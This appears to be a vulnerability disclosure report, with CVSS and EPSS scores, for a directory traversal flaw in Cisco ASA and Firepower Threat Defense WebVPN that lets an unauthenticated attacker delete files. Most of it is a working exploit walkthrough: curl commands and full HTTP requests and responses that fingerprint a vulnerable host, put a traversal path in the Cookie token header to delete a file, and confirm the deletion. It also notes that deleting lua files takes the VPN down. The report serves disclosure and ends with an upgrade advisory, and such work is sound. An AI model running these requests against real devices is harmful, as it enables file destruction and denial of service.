9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Summary:
A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.
Description:
Vulnerable host:
โโโโโโโโโโ
An exploit could allow the attacker to view or delete arbitrary files on the system.
1.Identifying vulnerable host by send request to /+CSCOE+/session_password.html.
curl -skiL โโโโ/+CSCOE+/session_password.htmlโ
GET /+CSCOE+/session_password.html HTTP/1.1
Host: โโโโโโโ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
If the target is vulnerable, the response header will display webvpn header, like:
The request gave me the following response
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
2.Perform exploits to delete files by adding token in cookie header request.
For example, I wanted to delete this (โโโโโโ/+CSCOU+/csco_logo.gif) file.
That did not work because sometimes logo.gif/png has permission issues so try this โโโโโโ/+CSCOE+/blank.htmlโ
You can also delete the file โ/+CSCOE+/blank.htmlโ (an empty HTML file), as it might be a problem with the permission of the custom logo file sometimes logo.gif has permission issue so we might not be able to delete but we can delete other files
Request:
Host: โโโโโโ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1```
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13
<HTML></HTML>
**3. So I exploited the CVE and deleted the blank file. As following:**
Request:
GET /+CSCOE+/session_password.html HTTP/1.1
Host: โโโโโโโโโ
Cookie: token=โฆ/+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: /
Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
File deleted successfully:
`curl -Ik โโโโ/+CSCOE+/blank.html`
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN
File not found
Warning : This can lead to a denial of service (DOS) on the VPN by deleting the lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.
## Suggested Mitigation/Remediation Actions
Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
## Impact
*High - This vulnerability allows the attacker to delete files within the web services file system.*
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%